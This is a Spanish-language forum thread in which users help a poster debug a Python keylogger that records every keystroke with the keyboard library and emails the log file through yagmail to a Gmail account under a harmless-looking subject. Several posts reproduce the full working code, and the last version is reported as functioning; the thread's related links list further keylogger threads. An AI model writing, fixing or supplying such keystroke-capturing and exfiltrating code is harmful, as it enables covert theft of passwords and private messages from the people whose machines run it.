Autor
|
Tema: Problema con Keylogger en Python (No envía el log) (Leído 9,124 veces)
|
Segadorfelix
Desconectado
Mensajes: 157
|
En el ultimo script, creo que falta importar estos módulos. Prueba si funciona. import time, datetime import smtplib import sys
En el primer script sobra: import yagmail
En el segundo script sobra: import atexit import os import keyboard if __name__ == "__main__": main()
Si el ultimo script sigue sin funcionar, postea que error da, o que ocurre (Por ejemplo: No envía el correo, no crea el archivo que guarda los datos). Revisar la zona de spam en el correo. Mucha suerte!
|
|
|
En línea
|
|
|
|
TheFerret
Desconectado
Mensajes: 44
|
Ahora funciona perfectamente el segundo script, el de enviar el correo, pero el primer script no funciona. Es decir, ejecuto el keylogger, todo correcto, pero cuando reviso el correo me llega el log vacío. Adjunto el código de los script juntos: from functools import partial import atexit import os import keyboard MAP = { "space": " ", "\r": "\n" } # Ubicación y nombre del archivo que guarda las teclas presionadas. FILE_NAME = "keys.txt" # Determina si el archivo de salida es limpiado cada vez que se # inicia el programa. CLEAR_ON_STARTUP = False # Tecla para terminar el programa o None para no utilizar ninguna tecla. TERMINATE_KEY = "esc" def callback(output, is_down, event): if event.event_type in ("up", "down"): key = MAP.get(event.name, event.name) modifier = len(key) > 1 # Capturar únicamente los modificadores cuando están siendo # presionados. if not modifier and event.event_type == "down": return # Evitar escribir múltiples veces la misma tecla si está # siendo presionada. if modifier: if event.event_type == "down": if is_down.get(key, False): return else: is_down[key] = True elif event.event_type == "up": is_down[key] = False # Indicar si está siendo presionado. key = " [{} ({})] ".format(key, event.event_type) elif key == "\r": # Salto de línea. key = "\n" # Escribir la tecla al archivo de salida. output.write(key) # Forzar escritura. output.flush() def onexit(output): output.close() def main(): # Borrar el archivo previo. if CLEAR_ON_STARTUP: os.remove(FILE_NAME) # Indica si una tecla está siendo presionada. is_down = {} # Archivo de salida. output = open(FILE_NAME, "a") # Cerrar el archivo al terminar el programa. atexit.register(onexit, output) # Instalar el registrador de teclas. keyboard.hook(partial(callback, output, is_down)) keyboard.wait(TERMINATE_KEY) from functools import partial import time, datetime import smtplib import yagmail import sys yag = yagmail.SMTP('correo@gmail.com', 'contraseña') yag img = "C:/Users/Andrés/Desktop/keys.txt" yag.send('correo@gmail.com', "Birthday", contents = [img])
NOTA: Sospechando que lo que sucedía era que al no existir un temporizador, Python no me dejaba escribir pues ya enviaba el fichero directamente, probé a colocar un time.sleep(20), pero el resultado es el mismo lamentablemente
|
|
|
En línea
|
|
|
|
yuimugi912
Desconectado
Mensajes: 20
|
prueba cerrando el archivo cada vez que escribes algo en el , en vez de hacerlo al final , a veces termina en la ram y luego no lo escribe hasta que le das close
otra opcion es que sea un bug de la libreria, pero sigue saliendo el mismo error?
Edit: ahh veo que usas flush para eso del archivo
|
|
« Última modificación: 23 Abril 2019, 05:59 am por yuimugi912 »
|
En línea
|
|
|
|
TheFerret
Desconectado
Mensajes: 44
|
Puede ser que el error esté en la parte de "#Cerrar el archivo al terminar al programa"?
Quizás el programa queda corriendo y el archivo no llega a cerrarse y por eso no se guarda nada? Podría ser?
Actualmente no sale error alguno, el programa se ejecuta sin errores, y por separado funcionan excelente, solo al unirlos llega el correo pero con un log vacío, vamos, que básicamente o no está escribiendo o no está guardando lo escrito...
|
|
|
En línea
|
|
|
|
yuimugi912
Desconectado
Mensajes: 20
|
Puede ser que el error esté en la parte de "#Cerrar el archivo al terminar al programa"?
Quizás el programa queda corriendo y el archivo no llega a cerrarse y por eso no se guarda nada? Podría ser?
no tendria porque cuando le haces archivo.flush() escribe sin necesidad de cerrar el archivo . PD: si dices que separado funciona bien, es decir que el log se escribe por separado pero por correo no llega? .Si la respuesta es si prueba copiar el archivo y enviar la copia por si acaso no se ha cerrado y el sistema operativo lo esta bloqueando
|
|
« Última modificación: 26 Abril 2019, 04:00 am por yuimugi912 »
|
En línea
|
|
|
|
TheFerret
Desconectado
Mensajes: 44
|
no tendria porque cuando le haces archivo.flush() escribe sin necesidad de cerrar el archivo .
PD: si dices que separado funciona bien, es decir que el log se escribe por separado pero por correo no llega? .Si la respuesta es si prueba copiar el archivo y enviar la copia por si acaso no se ha cerrado y el sistema operativo lo esta bloqueando
Por separado funcionan ambas cosas, es decir, yo si ejecuto primero un script y luego el otro, funciona todo excelente. Al ejecutar el primer script guarda el registro de teclas en el archivo y al ejecutar el segundo script, envía el archivo al correo electrónico. Pero en cuanto quiero hacer de esos dos script un solo script ya vienen los problemas, pues llega el correo, pero con el fichero sin alterar, es decir, sin registrar las teclas. Respecto a lo segundo, voy a intentarlo, pero es raro pues el script sólo sí que funciona sin problemas (tanto el primero como el segundo) EDITO: Acabo de intentar copiar el fichero con el módulo Shutil y que se envíe el fichero copiado al correo, pero nada, sigue llegando vacío
|
|
« Última modificación: 26 Abril 2019, 04:33 am por TheFerret »
|
En línea
|
|
|
|
Segadorfelix
Desconectado
Mensajes: 157
|
Prueba este código, le hice modificaciones mínimas, pero puede que sirva. *La importación de módulos ocurre toda de una vez y al inicio. *El valor del archivo al cual se le debe escribir, esta especificado junto a la ruta. from functools import partial import time, datetime import smtplib import yagmail import sys import atexit import os import keyboard MAP = { "space": " ", "\r": "\n" } # Ubicación y nombre del archivo que guarda las teclas presionadas. FILE_NAME = "C:/Users/Andrés/Desktop/keys.txt" # Determina si el archivo de salida es limpiado cada vez que se # inicia el programa. CLEAR_ON_STARTUP = False # Tecla para terminar el programa o None para no utilizar ninguna tecla. TERMINATE_KEY = "esc" def callback(output, is_down, event): if event.event_type in ("up", "down"): key = MAP.get(event.name, event.name) modifier = len(key) > 1 # Capturar únicamente los modificadores cuando están siendo # presionados. if not modifier and event.event_type == "down": return # Evitar escribir múltiples veces la misma tecla si está # siendo presionada. if modifier: if event.event_type == "down": if is_down.get(key, False): return else: is_down[key] = True elif event.event_type == "up": is_down[key] = False # Indicar si está siendo presionado. key = " [{} ({})] ".format(key, event.event_type) elif key == "\r": # Salto de línea. key = "\n" # Escribir la tecla al archivo de salida. output.write(key) # Forzar escritura. output.flush() def onexit(output): output.close() def main(): # Borrar el archivo previo. if CLEAR_ON_STARTUP: os.remove(FILE_NAME) # Indica si una tecla está siendo presionada. is_down = {} # Archivo de salida. output = open(FILE_NAME, "a") # Cerrar el archivo al terminar el programa. atexit.register(onexit, output) # Instalar el registrador de teclas. keyboard.hook(partial(callback, output, is_down)) keyboard.wait(TERMINATE_KEY) yag = yagmail.SMTP('correo@gmail.com', 'contraseña') yag img = "C:/Users/Andrés/Desktop/keys.txt" yag.send('correo@gmail.com', "Birthday", contents = [img])
Si sigue sin funcionar, luego de probarlo, cambia a Ruby que es más divertido es broma, si no funciona, voy a darle una ojeada más sería, para ver que pasa.
|
|
« Última modificación: 26 Abril 2019, 10:55 am por Segadorfelix »
|
En línea
|
|
|
|
TheFerret
Desconectado
Mensajes: 44
|
Prueba este código, le hice modificaciones mínimas, pero puede que sirva. *La importación de módulos ocurre toda de una vez y al inicio. *El valor del archivo al cual se le debe escribir, esta especificado junto a la ruta. from functools import partial import time, datetime import smtplib import yagmail import sys import atexit import os import keyboard MAP = { "space": " ", "\r": "\n" } # Ubicación y nombre del archivo que guarda las teclas presionadas. FILE_NAME = "C:/Users/Andrés/Desktop/keys.txt" # Determina si el archivo de salida es limpiado cada vez que se # inicia el programa. CLEAR_ON_STARTUP = False # Tecla para terminar el programa o None para no utilizar ninguna tecla. TERMINATE_KEY = "esc" def callback(output, is_down, event): if event.event_type in ("up", "down"): key = MAP.get(event.name, event.name) modifier = len(key) > 1 # Capturar únicamente los modificadores cuando están siendo # presionados. if not modifier and event.event_type == "down": return # Evitar escribir múltiples veces la misma tecla si está # siendo presionada. if modifier: if event.event_type == "down": if is_down.get(key, False): return else: is_down[key] = True elif event.event_type == "up": is_down[key] = False # Indicar si está siendo presionado. key = " [{} ({})] ".format(key, event.event_type) elif key == "\r": # Salto de línea. key = "\n" # Escribir la tecla al archivo de salida. output.write(key) # Forzar escritura. output.flush() def onexit(output): output.close() def main(): # Borrar el archivo previo. if CLEAR_ON_STARTUP: os.remove(FILE_NAME) # Indica si una tecla está siendo presionada. is_down = {} # Archivo de salida. output = open(FILE_NAME, "a") # Cerrar el archivo al terminar el programa. atexit.register(onexit, output) # Instalar el registrador de teclas. keyboard.hook(partial(callback, output, is_down)) keyboard.wait(TERMINATE_KEY) yag = yagmail.SMTP('correo@gmail.com', 'contraseña') yag img = "C:/Users/Andrés/Desktop/keys.txt" yag.send('correo@gmail.com', "Birthday", contents = [img])
Si sigue sin funcionar, luego de probarlo, cambia a Ruby que es más divertido es broma, si no funciona, voy a darle una ojeada más sería, para ver que pasa. Jajajajaja a este paso si eh,no le caigo muy bien a Python, ya estamos teniendo roces nada más empezar Acabo de probar y lamentablemente el resultado arrojado es el mismo, fichero enviado al correo pero intacto. Respecto a lo de la importación de módulos al inicio y el valor del archivo especificado junto a la ruta, te agradezco que arregles mi caos de código jajaja. Pero nada, la cosa sigue igual
|
|
|
En línea
|
|
|
|
Segadorfelix
Desconectado
Mensajes: 157
|
Prueba este código, creo que el error estaba en usar a yagmail antes de: if __name__ == "__main__": main()
Código: from functools import partial import atexit import os import keyboard import time, datetime import smtplib import yagmail import sys MAP = { "space": " ", "\r": "\n" } # Ubicación y nombre del archivo que guarda las teclas presionadas. FILE_NAME = "C:/Users/Andrés/Desktop/keys.txt" # Determina si el archivo de salida es limpiado cada vez que se # inicia el programa. CLEAR_ON_STARTUP = False # Tecla para terminar el programa o None para no utilizar ninguna tecla. TERMINATE_KEY = "esc" def callback(output, is_down, event): if event.event_type in ("up", "down"): key = MAP.get(event.name, event.name) modifier = len(key) > 1 # Capturar únicamente los modificadores cuando están siendo # presionados. if not modifier and event.event_type == "down": return # Evitar escribir múltiples veces la misma tecla si está # siendo presionada. if modifier: if event.event_type == "down": if is_down.get(key, False): return else: is_down[key] = True elif event.event_type == "up": is_down[key] = False # Indicar si está siendo presionado. key = " [{} ({})] ".format(key, event.event_type) elif key == "\r": # Salto de línea. key = "\n" # Escribir la tecla al archivo de salida. output.write(key) # Forzar escritura. output.flush() def onexit(output): output.close() def main(): # Borrar el archivo previo. if CLEAR_ON_STARTUP: os.remove(FILE_NAME) # Indica si una tecla está siendo presionada. is_down = {} # Archivo de salida. output = open(FILE_NAME, "a") # Cerrar el archivo al terminar el programa. atexit.register(onexit, output) # Instalar el registrador de teclas. keyboard.hook(partial(callback, output, is_down)) keyboard.wait(TERMINATE_KEY) if __name__ == "__main__": main() yag = yagmail.SMTP('correo@gmail.com', 'contraseña') yag img = "C:/Users/Andrés/Desktop/keys.txt" yag.send('correo@gmail.com', "JoJoJo", contents = [img])
A mi me funciona correctamente, instale con un instalador el modulo keyboard, y yagmail por pip. Si sigue fallando puede que el cortafuegos este 'atrofiando' a yagmail, como dice yumigumi. Si falla, primero revisa, el archivo keys.txt del escritorio, si se esta escribiendo correctamente. Después si sale un error, puedes subir una captura a https://es.imgbb.com/ y despues al foro, para ver de que se trata. Y si no sale un error, el keys.txt se escribe correctamente y las ubicaciones del archivo y el correo están bien, entonces no queda otra que revisar el cortafuegos. Mucha suerte!
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
[Python] Kaley, Keylogger simple en Python
Python
|
Fyrox
|
0
|
7,478
|
21 Septiembre 2011, 23:24 pm
por Fyrox
|
|
|
[Python] Simple Keylogger
Python
|
BigBear
|
0
|
4,338
|
7 Octubre 2011, 01:38 am
por BigBear
|
|
|
problema con creacion de keylogger python!!
Scripting
|
eliander20
|
0
|
2,490
|
17 Septiembre 2016, 11:07 am
por eliander20
|
|
|
BeeLogger|KEYLOGGER|PYTHON|
Hacking
|
d0r127
|
7
|
10,968
|
4 Diciembre 2017, 06:38 am
por T1cxT4c
|
|
|
Mejorar el keylogger PYTHON
Scripting
|
botters
|
0
|
2,117
|
13 Febrero 2019, 03:07 am
por botters
|
|